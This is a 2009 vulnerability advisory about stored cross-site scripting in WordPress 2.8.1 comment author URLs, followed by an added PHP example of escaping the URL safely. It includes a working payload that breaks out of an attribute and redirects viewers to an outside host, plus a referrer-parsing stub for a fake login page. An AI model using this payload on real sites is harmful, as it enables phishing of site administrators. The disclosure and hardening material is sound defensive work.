WordPress 2.8.1 comment display XSS vulnerability - vulnerability warning - the black bar safety net

2009-07-16T00:00:00
ID MYHACK58:62200923911
Type myhack58
Reporter Anonymous
Modified 2009-07-16T00:00:00

Description

Ghost boy's blog and XEYE's blog assisted with testing.

POC:

  1. In the comment URL field, enter:

     http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

The String.fromCharCode sequence sends the viewer to http://www.inbreak.net/a.php.



Description of the full process:

a.php code:

    <?php
    // Extract the host name of the page that referred the visitor here.
    $website = $_SERVER['HTTP_REFERER'];
    $website = strtolower($website);
    $website = substr($website, 7);
    $website = substr($website, 0, strpos($website, '/'));

    // This page is used to impersonate the login page; the harm is huge. The code is not convenient to post.
    ?>

wp.php code:

    <?php
    // Is lv my filter.
    ?>

Vulnerability code:

The front-end comment display also has this vulnerability.

How to patch:

    2085: $author_url = get_comment_author_url();

    2182: case 'author':
              echo "<td $attributes><strong>"; comment_author(); echo '</strong><br />';
              if ( ! empty($author_url) )
                  echo "<a title='$author_url' href='$author_url'>$author_url_display</a><br />";
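As an added example, not code from the advisory and not WordPress's own patch, the stand-alone PHP below puts the unsafe echo pattern from the lines above beside a hardened version: the comment author URL is restricted to http(s) and attribute-escaped with ENT_QUOTES before it is written into the <a> tag, so a single quote in the value can no longer close the attribute. The function names and the sample URL are constructed for this example and do not depend on WordPress.

```php
<?php
// Added example (not from the advisory or WordPress). Runs with plain PHP.

// Constructed input in the shape of the advisory's payload: a single quote
// closes the href='...' attribute and an event handler follows it.
$author_url = "http://example.invalid/abc' onmousemove='alert(1)";

// Vulnerable rendering, equivalent to the echo in the advisory: the raw
// value is interpolated into a single-quoted attribute and into the text.
function render_unsafe($url) {
    return "<a title='$url' href='$url'>$url</a><br />";
}

// Hardening step 1: accept only http and https URLs. parse_url() returns
// false on badly malformed input; anything without an allowed scheme is
// dropped, which also removes javascript: and data: URLs.
function safe_author_url($url) {
    $url = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'])
        || !in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return '';
    }
    return $url;
}

// Hardening step 2: HTML-escape with ENT_QUOTES so neither ' nor " can
// terminate the attribute, and reuse the escaped value for the link text.
function render_safe($url) {
    $url = safe_author_url($url);
    if ($url === '') {
        return '';
    }
    $attr = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return "<a title='$attr' href='$attr'>$attr</a><br />";
}

echo "Unsafe: ", render_unsafe($author_url), "\n";
echo "Safe:   ", render_safe($author_url), "\n";
```

In the unsafe output the attribute ends right after `abc` and `onmousemove='alert(1)'` becomes a live attribute of the link; in the safe output the quote is emitted as `&#039;`, so the whole string stays inside `href` and `title` as inert text. In WordPress 2.8 itself the equivalent helpers are `esc_url()` and `esc_attr()`; the scheme allowlist is kept separate here because escaping alone does not stop a `javascript:` URL from being a valid, clickable href.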